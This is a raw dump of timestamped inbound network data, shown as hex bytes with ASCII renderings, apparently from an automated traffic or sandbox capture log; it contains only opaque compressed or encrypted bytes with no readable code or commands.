                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8199INData Raw: 58 20 6b fe 26 95 64 42 8d 0c 8e 37 d4 78 2f 87 c5 af e8 04 e5 3d 7a fc c7 87 9d ab d1 ab 06 b0 ba dd ea 71 40 25 9a 9d bd f2 fd 7f be 0f 00 4b 9d 81 1e 84 73 9d 43 9f 2d 3e 78 0e 79 3e ea 21 a9 c1 93 c7 3e 3e 00 c5 36 9e e9 9e a0 3e b7 ba 1a 34 f7 78 09 95 1e c9 c0 7d a9 f3 9a 65 18 03 a7 6a b2 63 5f 5c c4 ed a3 cd 89 bf 29 b7 a8 ad b2 94 91 a6 77 11 d8 72 5f 01 97 84 fe 6a 05 e2 7c b2 9e 7b 75 3f 58 9b dd 23 05 ff 32 e9 20 49 5b c3 ef 85 97 fd 34 6e c3 5a aa 20 76 2d 05 30 60 ab 0e af 67 a2 31 a6 1f 24 54 95 b4 15 9b 25 d9 12 0d 3b bc 14 b2 57 17 f0 d1 e4 a2 05 b2 51 98 6c ea 32 2e 86 ac 46 26 11 f9 84 bb a2 25 61 17 5d f7 5c ed 10 5d 85 77 93 50 38 bc 4e 24 1e 1b 64 8e 10 36 6b 55 6f 98 f8 6e 98 24 41 93 0b 88 8b 71 01 e6 d9 e1 bc 73 ba 4e 85 89 9c 0f
                                                                                                                                                                                                                                    Data Ascii: X k&dB7x/=zq@%KsC->xy>!>>6>4x}ejc_\)wr_j|{u?X#2 I[4nZ v-0`g1$T%;WQl2.F&%a]\]wP8N$d6kUon$AqsN
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8215INData Raw: 9d 81 c0 a9 95 40 ff 4b c8 ee 1a af 23 82 99 1f 32 95 80 3e e2 7e 55 a9 46 23 26 31 0e f7 6c 71 0a 7b f5 c3 09 87 09 8a b1 4c 70 e8 eb e5 97 d2 b3 02 df c6 c5 49 af 21 26 b5 5e d9 07 ac 1c e7 5c bd 7d 4a a3 59 0f 30 3c 78 89 33 18 67 e9 d8 38 4a 67 8b 63 9f 35 c0 ae 3e 06 6a 43 fe af 33 a0 d3 a7 a6 fc 35 58 43 8c b2 41 00 86 5d 7e 98 6a 2a d8 be 7a a6 72 56 f6 af c5 a2 95 07 3b c5 02 59 d2 89 9f e6 a5 db 0a 09 c2 4a fc b3 07 87 5e 7b 80 89 3b 3e 08 fe f8 af a0 2a e7 ac 0d 26 38 19 57 ab aa 7c 9d a8 00 88 e5 26 7d f6 e5 76 a6 47 dd 05 52 cb 0c c9 8d 4c b5 5e 3a 44 8a fc 89 8e 7a 8b 6f 34 68 52 2b fb 52 54 67 9b fb 01 be c5 82 7b da b7 72 ff fe 0a 86 e7 b0 a4 75 53 d8 7a ec df f2 16 88 37 50 72 2f b6 b8 9b 27 ab 75 86 7e e3 0f 77 6a 73 6e 88 06 79 f2 55 65
                                                                                                                                                                                                                                    Data Ascii: @K#2>~UF#&1lq{LpI!&^\}JY0<x3g8Jgc5>jC35XCA]~j*zrV;YJ^{;>*&8W|&}vGRL^:Dzo4hR+RTg{ruSz7Pr/'u~wjsnyUe
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8231INData Raw: db d5 94 6f bb 32 b0 41 ee 4e 54 d5 ea 44 26 c4 e1 df f0 38 8f 43 87 57 94 81 d5 46 fd 22 99 7f 1d 87 6e c7 22 48 dc 4a 6c 29 f5 40 cd dd a3 6e a4 56 03 90 ed cc 8f e3 a3 5c 5b 23 4a 33 9c 07 57 ae b1 ed ff cb a7 94 e0 95 64 f9 28 f0 a7 7f d4 4e f8 38 7f 5c f1 66 df dd 48 5f cd 1d 9a 43 1d be 02 d3 d5 a5 a6 56 7c 3d d2 16 e5 4d 97 c5 8a 78 ab a1 c0 e4 34 db c5 fd b5 cd 37 84 67 89 7b c4 3a 5b d8 8e be 26 57 0e 0d 0c 35 89 6a 21 61 2a 20 4e ee f5 8e 7a d6 7a 98 db 1f 10 e2 0f c8 be 69 b4 6c 3d d9 84 7c a2 bc 02 08 68 63 f2 a8 f0 02 e5 20 36 90 8c f3 96 22 cd 12 f7 8b 2f 9b 82 13 81 08 2d 5d fb 19 64 ca 91 b8 64 26 80 3b 42 6a 24 29 88 78 04 9f 10 1b 81 8d e6 48 27 0c 4b eb b9 93 ce eb 3a 06 11 ae 9e b1 93 48 50 4e 2f 15 00 54 f0 51 dd c6 86 76 5c 14 d7 ae
                                                                                                                                                                                                                                    Data Ascii: o2ANTD&8CWF"n"HJl)@nV\[#J3Wd(N8\fH_CV|=Mx47g{:[&W5j!a* Nzzil=|hc 6"/-]dd&;Bj$)xH'K:HPN/TQv\
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8247INData Raw: 3e 89 eb e9 b4 c5 18 72 dc bb ce 09 3e a6 1b 98 68 f0 e4 e6 d0 69 03 f6 e8 12 f4 b7 28 6b df 3d c6 cb 2d bc c2 c5 ce 1e ce 87 fe c8 c1 67 07 37 58 01 1a 25 ad 2a 9f 7a ce ac f5 87 d2 13 fa 1b 4a 12 8e c0 bf ec a1 0c 36 5f e2 cc 07 3b ec 48 7b 99 dc d2 a5 b6 b3 9b 62 25 1b 0f f1 b0 66 9b 58 e2 d1 1f c3 2a 6c da fb 95 03 de b4 d9 4a 0a 3c a2 d0 8d ec 36 c9 cd cd 34 2b 7a 47 1c 2b d6 29 31 f8 a3 dc 7c 99 58 c2 35 bd b3 99 c4 d4 0e 0b e4 f4 42 fc 4a a9 fa fe e9 30 6e a1 0d 28 6c 59 d1 41 10 3f c8 78 b9 94 d4 21 b6 d7 fc a3 1f 01 dd a6 f8 da 92 2d cb b6 51 ac c4 73 63 6e 41 66 50 02 c7 07 7e 0e 42 69 5c 71 ae 53 d3 98 f9 84 61 14 a3 f8 75 c4 24 b5 f5 5e 8c f6 17 54 42 a2 f0 18 03 98 7f 57 bf 8f d7 c5 24 44 37 d6 d2 76 1e 72 f3 f7 77 6f 6b db 3a 35 ab b2 48 cc
                                                                                                                                                                                                                                    Data Ascii: >r>hi(k=-g7X%*zJ6_;H{b%fX*lJ<64+zG+)1|X5BJ0n(lYA?x!-QscnAfP~Bi\qSau$^TBW$D7vrwok:5H
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8263INData Raw: d3 26 86 5c 39 25 0d 34 01 bd ae b0 13 5d 5c ce 72 3e 36 57 6b b1 4c a0 bc a8 45 b4 d0 63 82 4b e8 f2 b9 a8 cd 6f 56 10 ea 2b 87 fe 17 53 bf 6a 9b ca 60 a1 53 f4 62 70 d0 aa 30 63 93 00 ea c2 eb 3d de e4 f8 31 10 ae f8 70 26 5a 42 cd 17 71 69 e9 56 1a 77 2e 00 ba 52 09 9a d2 d7 2d f5 f7 61 23 7d 52 e3 10 af 3a 4b 86 9b 16 e2 19 ab 07 04 2b 5b 60 1c 7c b1 37 08 ad f2 39 50 e3 42 71 a2 79 ec 1e 1a 33 ab f0 6d 35 37 68 f7 dc b4 76 50 90 ad ad c3 12 36 7c 2c fa ec b1 61 ce a9 2b 8b 43 60 c8 18 e8 8c 9a a9 7a cf 87 77 78 de 99 85 ff 46 5d 25 b7 9b c0 b1 a7 2f 0c fa 3e 1d 18 34 d3 b8 8b 5f 16 01 66 e7 81 be 6f fe 82 d5 25 7a 04 d4 79 0b fd bb fb 8c 29 53 02 9d 52 94 9f ea f5 a5 d5 8a b4 c7 bb 8d be 25 93 77 e8 31 21 78 17 33 07 0c d9 5b 68 c3 44 b5 ba ef 69 60
                                                                                                                                                                                                                                    Data Ascii: &\9%4]\r>6WkLEcKoV+Sj`Sbp0c=1p&ZBqiVw.R-a#}R:K+[`|79PBqy3m57hvP6|,a+C`zwxF]%/>4_fo%zy)SR%w1!x3[hDi`
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8279INData Raw: ef 7d 1c 35 f2 6e 5f 73 45 15 73 d8 f9 4c b9 db a9 6a 7b 02 35 ff b5 55 7c 5b 2b 5c 39 ef 43 c6 8f 5c e9 ed 00 12 33 85 8a 9e c0 8b 0f 65 f1 62 f6 08 a8 3d cd f9 07 26 63 5d ff a2 15 d2 2c 56 6c 04 3a 7a 9c 5f 16 f5 7a 54 fe ee 99 4b 48 1f c8 32 70 1d 8f b6 b6 5d 8a e9 aa 06 3e 43 90 96 ad f9 cb c8 4e 53 7d 07 b7 c1 58 7e e0 17 fc 2f c8 34 dc b2 72 80 f7 89 5a fe de ca dc 94 40 17 d5 b4 8e d7 40 01 c7 0c 5a 87 27 fd e6 41 d9 7e f5 e2 da 2e e7 85 7b 80 8a 68 ef b7 4b 80 d8 13 89 1e cd f3 40 c8 3b 10 93 fc a0 7a 64 e3 c6 e7 69 48 2f f0 39 38 c4 25 a0 38 67 8d 06 62 d0 33 c0 3f 2a 09 3e b2 e0 f0 7f 40 97 8c e8 b0 d9 d2 77 4c ed ce 16 7f ca d8 9e 1e d1 bb f5 ec f9 09 6c 1c 75 47 0c b8 35 f5 f6 bd 47 21 2f bd e5 84 27 8c 64 38 da 46 df 91 5a 37 20 39 bc c8 8e
                                                                                                                                                                                                                                    Data Ascii: }5n_sEsLj{5U|[+\9C\3eb=&c],Vl:z_zTKH2p]>CNS}X~/4rZ@@Z'A~.{hK@;zdiH/98%8gb3?*>@wLluG5G!/'d8FZ7 9
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8295INData Raw: 49 05 9b 91 d2 f0 7f 8e bf 82 6c 4c ab ec 4b 22 b9 05 8a cf 0a ae e3 76 d2 06 e1 c0 c1 50 fe 96 a1 64 c3 82 59 74 e2 06 0c 9a 9d f2 4b 3d 3b 08 ab 80 ef c7 d1 97 7b a3 33 6b b3 f4 58 2c d6 40 9a c9 66 38 fa ef 32 86 51 b1 6f 28 51 3d b0 1b 38 dc 6f b0 b4 75 b3 22 12 43 0b 82 5c a8 39 78 e0 81 00 13 79 82 c1 24 b1 f5 0f e9 89 b9 0c f0 fb 9b 46 04 8c 25 9b 57 d1 25 62 9c 1b e4 74 01 bd be 23 d2 8d cb 66 8f 75 42 54 0b 7d a0 20 05 37 c8 e8 36 74 00 e1 21 64 5a 64 46 f7 2e 86 5f 46 38 9e e6 05 e6 a5 5e a2 9f 51 cf d3 7b 3b 88 4b 86 e4 0e 84 ce 4b 34 fc b0 43 e9 b0 d3 a9 a8 a5 41 39 28 7d 17 31 c7 a4 85 df ce 38 74 31 3c d7 81 55 fa 2f f5 4c 00 fc 24 7b 87 d6 00 dd 72 76 31 68 08 fc aa e9 b2 4d 51 c7 f3 1a cf ec d6 a6 ef d9 95 88 a5 02 3b ea ad 6f d9 c5 ff a5
                                                                                                                                                                                                                                    Data Ascii: IlLK"vPdYtK=;{3kX,@f82Qo(Q=8ou"C\9xy$F%W%bt#fuBT} 76t!dZdF._F8^Q{;KK4CA9(}18t1<U/L${rv1hMQ;o
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8311INData Raw: 9f 0b 05 48 a8 2a 69 0b 07 d6 8e ad 87 a9 9d 66 d7 4b 00 6f fe c7 af df 64 a8 cf 25 56 11 5a 05 d4 c0 35 c1 29 b1 14 28 79 61 37 22 d2 58 93 d8 1a ff 5b dc 0d 69 03 1e a5 24 b3 75 25 42 a1 b3 91 9d 45 0c dd 5d 73 8d 97 58 0a d6 d9 25 3a 7d 0a 9a 0c b8 9e 6e 7e e7 4c f3 24 50 dd 0d 12 25 7d e7 c0 34 e8 73 6d d7 91 02 c8 dd d9 08 a1 10 6e e5 2e e5 93 3f 31 99 e6 3e 96 b1 8c 61 d7 58 b1 42 07 55 58 b4 cf 30 4f e2 9e cc 77 4c 69 e8 b8 f6 0c 20 ac 68 d3 13 76 5d 79 42 fa aa 7c f6 7d fb 10 c7 f3 9d bf 64 66 87 6a f3 1b 28 dc 63 72 94 a9 ef 31 c3 12 ba d6 7d 42 c2 c5 3b 61 4d 2e ec 7c 4a e8 59 e6 4d d3 53 fe 13 a3 1b 2d fc dd 59 e3 f4 67 25 b7 71 dd 15 ba 99 33 32 76 6e 69 7c 6d 53 d7 72 d4 f3 be 7b 28 fc 53 ab 86 78 bc e9 3e 79 be df 35 c1 f2 02 16 6b da 35 21
                                                                                                                                                                                                                                    Data Ascii: H*ifKod%VZ5)(ya7"X[i$u%BE]sX%:}n~L$P%}4smn.?1>aXBUX0OwLi hv]yB|}dfj(cr1}B;aM.|JYMS-Yg%q32vni|mSr{(Sx>y5k5!
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8327INData Raw: a8 c2 01 e6 64 4a a7 2e a5 cd 00 18 79 e2 d0 86 4f dd 0b ef 16 70 58 86 7f 9a e1 23 8f 67 10 af d5 5e 5d 97 92 b7 9a 03 0b 9b cb e8 d5 44 e7 13 59 0f e7 a2 5f 8b 29 1b b1 a3 ca cb 0a a7 c6 b1 0f c8 db 32 06 42 8e c9 c0 29 4b 42 23 67 a7 53 a8 8a f7 77 ee f6 dd fc c0 e8 be cc 5b a5 40 e8 65 26 86 df 09 b1 be c7 65 7b 6d aa 7f c1 d5 d7 a2 c0 92 9a 77 ba af 70 8d 6c 48 b9 f2 e0 f1 ca 4a 30 55 59 c9 b6 f4 e8 f9 97 a1 7e 6f 61 7b a2 74 6c 5e 91 1e 5d 16 8d f4 a5 5e da 02 28 bf c0 be 75 2a 2e 8a ee 86 e3 70 08 36 d9 2d 7c b5 d1 45 01 76 cd 9a d3 c5 83 85 34 71 09 6b 8c cd b0 3e f3 82 3c 89 59 f7 64 9c 81 b3 08 c4 d3 39 7f 32 e1 47 af a4 72 e7 1d 79 9b 9f a9 ec 78 25 43 28 3e 0b 94 8a e6 1c 50 71 5b 0d 35 9c 36 bd 00 1f b4 34 14 76 9c 8f 58 c0 84 94 0f 5e ba c0
                                                                                                                                                                                                                                    Data Ascii: dJ.yOpX#g^]DY_)2B)KB#gSw[@e&e{mwplHJ0UY~oa{tl^]^(u*.p6-|Ev4qk><Yd92Gryx%C(>Pq[564vX^
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8343INData Raw: 40 eb 5b df df 29 90 ab c2 0f 13 67 e7 d5 73 88 4f 38 07 b1 24 fd 08 f2 ec 08 5d 43 24 8b 29 1e 6f 61 5c f1 99 b0 44 12 75 9e b2 f5 48 9b 3a 26 e6 ca 40 96 8e 54 e3 98 98 05 b3 f9 96 9d 3f 21 9e 7c fd 1f 49 a9 0d 44 02 81 ec 8d 0f a0 09 50 f2 37 43 03 c3 af 10 14 e1 0e e3 aa 5d be 81 f5 8a a2 1c 58 c1 14 ed 6a 9e b6 70 ab 95 dd 69 02 5c 84 43 7b 3c 52 4d 5b cb 83 69 0e 8b a3 f2 0c 5b ee be f1 a1 01 6b 0e 2f cf 23 80 ab 2f 71 5d 01 3d 14 96 98 68 ec 2d f8 38 26 da 2c 8f 76 95 f5 85 3e 8f d7 82 34 4f 7f 95 73 39 c4 bd 61 d6 de 23 1b 9f 28 81 cb 51 10 f1 81 6a e6 ca 06 c3 6e f2 e6 31 a7 6c 40 b4 33 ea 4d 14 67 31 ed 86 0b d1 86 ea 6f 4d 0b f3 a3 3c d3 c8 8f ee 69 35 3a 7f c6 8e 35 9a 8d c7 14 2f cf 06 d3 cc 42 b9 dc 37 3f 49 c3 b1 62 d6 c5 9f 28 c2 b2 d5 19
                                                                                                                                                                                                                                    Data Ascii: @[)gsO8$]C$)oa\DuH:&@T?!|IDP7C]Xjpi\C{<RM[i[k/#/q]=h-8&,v>4Os9a#(Qjn1l@3Mg1oM<i5:5/B7?Ib(
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8359INData Raw: 3c 0c 7e 32 f9 b1 f0 26 6b 33 63 95 4f 26 62 ea 63 10 27 83 42 57 6a 2c 1a 5f 2c 5e 8d c2 e1 3d 8a 5e ee 89 d4 e4 25 f2 0e 6e 5a 26 5d 6d 0b b6 22 15 8b fa 67 cf fa 54 fb cc c8 3a 22 37 f7 bf b8 8a 19 47 77 a5 2c 60 ea a6 06 85 99 68 35 8e 0d 1c b9 7a 20 c8 75 ac ef 6f 56 17 f0 c0 86 19 c1 9b 50 2c 2e 90 34 65 f7 2b fd 9c 35 6c be 2d 7a 45 94 ec 1b f4 c0 3a a7 3c c2 ce 06 00 a5 17 d1 cf a7 8f 1f f4 cd 8b 6f e8 de 76 e6 8e 46 b1 28 4f 36 b9 78 e8 76 9c ff 77 41 ba c7 8f 24 50 43 1b 6c 21 2c 95 1f e1 f5 f9 9c d8 0f 55 cf 5d e1 d9 2d e2 e6 9a a6 0b ee c0 bd 71 ba d3 88 88 1a 3f 29 22 48 3a ff 05 dc 4b 69 ea d1 35 97 41 10 86 53 56 a3 89 98 56 61 b6 92 78 9c cd ee 9e 1f 0d 4b db 9d 5f 36 44 55 6b 0a 4b 5a d8 e4 a2 f4 1f ec 1d 95 79 27 8e 03 4a c8 93 ff 53 22
                                                                                                                                                                                                                                    Data Ascii: <~2&k3cO&bc'BWj,_,^=^%nZ&]m"gT:"7Gw,`h5z uoVP,.4e+5l-zE:<ovF(O6xvwA$PCl!,U]-q?)"H:Ki5ASVVaxK_6DUkKZy'JS"
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8375INData Raw: 6c 4e dd f2 0c 6c bb c9 88 32 d6 36 85 a8 3f 93 6e a5 d8 ae ed 95 1b 7e da 58 10 69 be d6 8d 97 fe 19 5e d8 54 1f 65 1c 11 e1 e4 28 92 ee f4 76 d5 f8 57 5e 68 d9 c2 7d b3 a1 9f 05 88 a4 b7 77 bb 23 b6 3a 37 96 11 8a 5e c0 05 d4 28 77 ee ea 6e 8c 59 b8 38 dd dc 91 de 81 23 50 a2 ab 52 0c ea 99 d1 c4 e1 be f2 82 09 fc 16 f3 94 2c 1c dc 5c 02 f9 40 7f 18 c4 57 60 f5 e0 62 26 ab e6 32 c5 dc 96 95 c4 69 c8 36 73 0f 59 00 4f ad c2 a2 67 c6 f0 f6 3d 3d e9 3f 34 bc 08 dd f4 a3 4e 17 0f 60 4d d6 a9 d0 ff 9d 51 10 ef d6 9b 20 8f 4c 82 c1 af 35 45 4b 1f 84 99 e8 ff c0 a9 4b 22 3d 02 73 9e 30 ae 8d 70 e0 c8 fd 4b 7d da 6d e1 74 b6 ac b1 bb a4 d9 ae d3 0c 22 62 03 db 12 16 cc d2 34 a3 92 03 ab 52 26 36 e1 ec 8c 69 e2 99 cc fb 51 ab 39 ee ec 93 da 9a 65 0f 77 5c cc e4
                                                                                                                                                                                                                                    Data Ascii: lNl26?n~Xi^Te(vW^h}w#:7^(wnY8#PR,\@W`b&2i6sYOg==?4N`MQ L5EKK"=s0pK}mt"b4R&6iQ9ew\
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8391INData Raw: 09 8d f7 8d a8 b9 b6 dc ff 98 f1 d6 1a e8 00 dc f4 cc 9d 84 4f 47 a7 11 36 8c 8d 52 ef 68 05 90 b4 93 83 b0 a5 de ae 46 ee a1 f7 1a 9c 12 77 a1 67 9f 1d 63 b6 59 58 79 48 8a 48 e6 89 2d f3 b1 13 c0 ff a3 db 45 9d 07 b8 4b 30 ec 79 36 0e 6f e6 d6 9e e7 bf e8 56 13 2b 2d db f4 1c 24 fe 4f 4c ff b8 22 ee 67 59 24 34 d5 49 c8 8e eb ca db ff e2 09 9a 51 89 42 64 11 2d 61 95 eb e0 f6 78 4f ec 72 36 a1 c3 b7 84 70 35 da 21 bb 91 9d 70 37 5c 70 b3 e1 c8 a5 cb 7c f9 95 95 b0 0b 43 e3 44 a0 cd 41 36 05 1c 7b b3 e7 54 0a f6 02 42 29 f2 9e 4e 21 e0 cc 5b ba bc 9a fa 52 38 ed 78 81 5c 1e 50 63 34 c5 e9 83 1c 8d 1e 6b 14 0c 63 04 ec df f7 23 fa f2 de 58 c3 8d 93 a3 88 ba f8 ca f0 74 76 a9 02 5d b2 2a 4d b8 de f1 6e 6a 28 83 25 d7 10 d0 38 79 0e ef 08 4f 71 9d 4a 71 96
                                                                                                                                                                                                                                    Data Ascii: OG6RhFwgcYXyHH-EK0y6oV+-$OL"gY$4IQBd-axOr6p5!p7\p|CDA6{TB)N![R8x\Pc4kc#Xtv]*Mnj(%8yOqJq
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8407INData Raw: eb 08 1c eb 60 2f d5 9d 55 7b 2e 9e 39 cc 15 e2 8e 27 98 9d bc 0b 09 01 1f c1 20 07 8f 5b f6 6c 3c fe 2e 01 86 81 95 55 80 a2 a2 35 33 59 0f 1b e5 6c ee a6 77 98 0a 0b e8 c0 78 2e f8 ef f6 14 5d 5a ae 96 f1 9d 8d bc 77 bd 82 c0 00 bb 32 ec 2e 29 a4 dc eb 33 2b 93 a5 e3 24 57 56 9a 53 db ce 4f c2 bb 21 f2 71 bc d4 21 97 c5 b8 82 4b f0 aa 53 bd 55 bf 13 80 be ff fd ad 3b b0 ce 8d db 36 df df 04 47 fe 3f ff 47 12 87 f5 d4 c6 d4 77 ea 3f 09 97 92 51 ef 77 bf 9a 4e 0f f9 90 6e 46 5c 5a 89 f0 98 a2 1c ec 41 48 52 00 17 4e c7 2c e0 34 23 ea 02 09 7e 37 58 30 6c 0f 04 55 54 59 a2 41 9e 36 1f 6c bf b5 28 9d ed d1 0e cc df e0 db 1c 5a 59 32 a2 bb 23 1e 6c 56 0c 18 f8 ef 3a e2 ac 9c 99 48 2e aa 9b 27 4f 01 be a0 f0 0e 65 97 96 79 f7 16 c0 32 2c 0b d7 59 27 bd b4 c3
                                                                                                                                                                                                                                    Data Ascii: `/U{.9' [l<.U53Ylwx.]Zw2.)3+$WVSO!q!KSU;6G?Gw?QwNnF\ZAHRN,4#~7X0lUTYA6l(ZY2#lV:H.'Oey2,Y'
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8423INData Raw: 3f 94 6d 7f 20 05 1a 9e 31 e2 64 ed 15 43 c9 ee 58 98 37 16 e2 de 5d b3 d3 d5 86 d3 3d 9b 03 91 c0 90 32 7f 5f 30 8d c9 2f 33 88 10 a5 87 ec 3a c7 df 46 ab c9 1c d4 24 fe 05 86 56 9b 38 07 6a be f7 69 ae 00 a4 bf cf a9 47 60 67 82 62 7f 3a 38 79 5c 50 13 7f 55 8f ec 92 33 60 6a 3a 60 72 2f a8 bd 87 38 54 87 17 4e 57 40 5a 56 7e 3e cd d7 b4 42 5d d2 72 80 22 e1 d2 51 9c 8b a9 8f 69 e7 8d 5b 9d 72 7b 52 0a 9c 0e 0b c0 f4 bc b6 9b 13 b0 c9 e7 0c c0 12 9f 06 23 4f 9c 47 a9 56 a2 3b d8 f0 bd 3f 4d 20 a0 3f 6a 3b 9c fa 8c a0 b3 13 8d 2e a7 35 d0 2a 74 41 71 9f d6 80 65 8f 51 2a d7 ab c9 e7 e5 8d a7 c3 6e e7 97 d8 f3 51 1c 46 d9 72 1d 39 50 a6 dc 3c 66 1e e5 3f 65 d0 4c 75 01 03 45 49 c1 ed 0a a1 fa 26 22 63 2c d2 9a b9 3c ef 36 28 0d c2 01 e8 08 c6 6c d6 23 fe
                                                                                                                                                                                                                                    Data Ascii: ?m 1dCX7]=2_0/3:F$V8jiG`gb:8y\PU3`j:`r/8TNW@ZV~>B]r"Qi[r{R#OGV;?M ?j;.5*tAqeQ*nQFr9P<f?eLuEI&"c,<6(l#
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8439INData Raw: 90 5d 9f 01 44 02 56 41 36 85 ea f5 a0 ff 80 e0 64 76 92 b1 fb 46 46 34 56 53 dd c8 98 ee 1d eb b8 ed bd 44 56 cf 33 ad b8 6f 0d a9 30 6e 8f 3b 11 8d 6d 55 3a 6c 70 65 b5 fc a2 e8 f6 07 c3 5f da f1 67 f7 68 49 80 0e bc 70 0a c3 5e 8a 98 b3 19 ca 52 6b d6 97 53 b8 d6 df fb 25 92 7f f7 7d 57 4e f3 3a 2b 9c c2 5a f5 3a 3b d0 6f 69 f4 b6 fe 3a b9 7b 44 e9 b3 82 90 84 5d 2f 2f 18 90 9b 6f 43 7f 7d 5c 8a d9 9b bc 50 1b 75 0c da 30 42 7e 82 fb 92 6a b8 0d 08 88 44 e9 8c ee 63 aa f3 88 6e 9a 06 11 51 e4 b8 d5 50 49 cf e6 d6 d0 1a 77 35 25 5c ff ee d0 b6 10 b9 5c bb aa 03 e5 1a 65 bd 39 0f ba 15 47 45 32 d0 24 34 64 3e 9a 10 7e 01 4b 72 ed 2d e8 3c a1 b9 da 8a f2 ea 82 01 e4 b1 07 ea f9 2d 59 47 b3 c2 e2 2d 5f e5 e2 d2 7b 10 1b 10 e8 f3 69 98 49 31 92 8b 9d 7b 30
                                                                                                                                                                                                                                    Data Ascii: ]DVA6dvFF4VSDV3o0n;mU:lpe_ghIp^RkS%}WN:+Z:;oi:{D]//oC}\Pu0B~jDcnQPIw5%\\e9GE2$4d>~Kr-<-YG-_{iI1{0
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8455INData Raw: e4 59 44 2f f3 43 52 0b a7 5d 5f 20 68 67 6c a8 e3 0a b9 a7 78 7e 36 ca ba fe 56 1c 63 68 71 7f 1d cb b5 8f 46 85 07 c7 c8 70 6e 70 62 f3 12 65 a3 e2 20 b7 3d 4e fd db 4b b0 57 88 95 25 4d a5 b9 fe 3f 40 c6 e2 40 1a ea 32 ab d5 af 1a 77 6b 9a 69 93 a5 7d a7 3b 45 4c c5 ee 35 b1 63 85 af ad 1a d3 2d 50 92 4c b2 e9 1d 49 a7 5f 08 6f b7 b6 d7 c1 41 f5 ad c2 e8 a0 8f cf 3c 57 99 21 f0 2d 49 61 e1 06 36 6d 5c ba 63 d0 a1 46 26 9a 35 e0 0a b0 c5 33 16 c3 82 67 ca 99 b6 a8 98 07 c8 18 55 3d 1b a0 24 41 b5 de 02 38 08 24 46 24 72 a0 da f8 ae 45 14 5b c4 4f b1 42 32 44 07 7c 34 b4 23 07 5e 9a 89 e2 53 21 a0 f0 2f ed ed 0a a7 1f 7d 6d 66 50 42 1a 29 67 91 3b 0e 5c 78 75 08 0b dd 48 9a cd 51 36 ce c2 f5 e6 30 83 04 09 bb 94 44 ca aa 1e 6c ce f9 02 e7 11 51 a7 51 b6
                                                                                                                                                                                                                                    Data Ascii: YD/CR]_ hglx~6VchqFpnpbe =NKW%M?@@2wki};EL5c-PLI_oA<W!-Ia6m\cF&53gU=$A8$F$rE[OB2D|4#^S!/}mfPB)g;\xuHQ60DlQQ
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8471INData Raw: 11 a9 56 87 bc 93 2e 2a b4 5e 0b b9 6a 32 a1 50 6b ad 0a c5 8c 13 38 5d 1c 23 a7 6f 1e 6a a7 03 70 13 2b d9 56 ae 95 e5 55 f9 a3 e8 cc f8 c3 7e 58 ff 59 3d 9b 8f 0d 6e 30 94 62 3a 17 aa 02 8f 40 f8 63 79 1e 77 f9 c5 b0 ab 74 4c bb 34 fd c8 73 54 4f 84 5f 3c 6f 9a c5 53 dd 2c ac 30 5a 31 38 51 33 09 8e f7 09 50 cc bf 0e 6d 67 78 9b c0 83 7e ca b4 fe 0c d3 27 54 cc ec d8 ee 4c 60 94 30 71 e7 f4 50 01 6f 33 3d 37 db 90 bd 8e 15 33 e1 50 a6 bc 88 f2 6a f7 0e f8 d8 27 2b a9 8f c7 01 ba ea 23 80 ff 14 3b 5e 8f 77 f3 fb 3b 8f 44 33 84 04 07 e3 e3 76 41 b8 b4 90 ba af 46 4a 91 23 9e b6 89 3f c9 a6 80 9f 68 4b 10 7d 24 03 32 5d d4 0a 68 bf 16 ac e6 a5 d0 ad b5 9f e6 8c 0b 71 cc f5 b1 c4 cf d6 8b 7a 17 51 45 38 a6 fd be 60 ea d3 a9 59 ca a2 6e b6 7e dd 3e e6 a3 b2
                                                                                                                                                                                                                                    Data Ascii: V.*^j2Pk8]#ojp+VU~XY=n0b:@cywtL4sTO_<oS,0Z18Q3Pmgx~'TL`0qPo3=73Pj'+#;^w;D3vAFJ#?hK}$2]hqzQE8`Yn~>
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC8487INData Raw: 91 c9 d6 03 94 1d 4b 6c 0c 08 76 ae cf 56 73 32 42 b3 77 ec a1 50 17 7c b2 95 3c 9e a2 33 56 5d 20 c8 fc 7e 13 c9 de 73 07 f9 da e4 fb aa 52 00 6c b7 b9 82 0e 59 1e a9 26 4a 24 51 4c b9 9f 57 74 f6 d9 80 f3 a5 a7 0f 6e 19 60 3f ef 8a 7f 12 fa 65 8d 36 12 6f d8 96 02 68 8b d7 4d fa 50 ea c9 08 74 8c d2 6d 6f 85 72 7d b7 61 5b 20 33 ba b1 76 5c fa 2e 32 86 6f 56 89 fb 48 0a 3d 55 c0 be 79 b9 27 15 ad 81 44 59 7d 34 1b 1d 8b 44 99 5b b3 ad 09 59 d9 b5 7b 4b 6a c1 c9 cf a8 cf 09 a2 53 54 6e 2f 0e fd be 47 25 ff 75 64 52 e4 c1 ef ea 16 c0 7b a8 8b cf 1d 57 49 1e 82 d5 9a bb 17 4c 16 05 5d 26 da e2 de 44 72 e6 18 d8 31 27 74 08 8c e5 d1 0e 0a 25 4f 87 6d 6d 21 66 cb 83 ff 84 c3 01 4f a1 1d bd 19 31 ab 71 df b6 5a e8 63 4c c1 6d 32 7b 26 87 eb 01 c5 18 f1 3a f8
                                                                                                                                                                                                                                    Data Ascii: KlvVs2BwP|<3V] ~sRlY&J$QLWtn`?e6ohMPtmor}a[ 3v\.2oVH=Uy'DY}4D[Y{KjSTn/G%udR{WIL]&Dr1't%Omm!fO1qZcLm2{&:
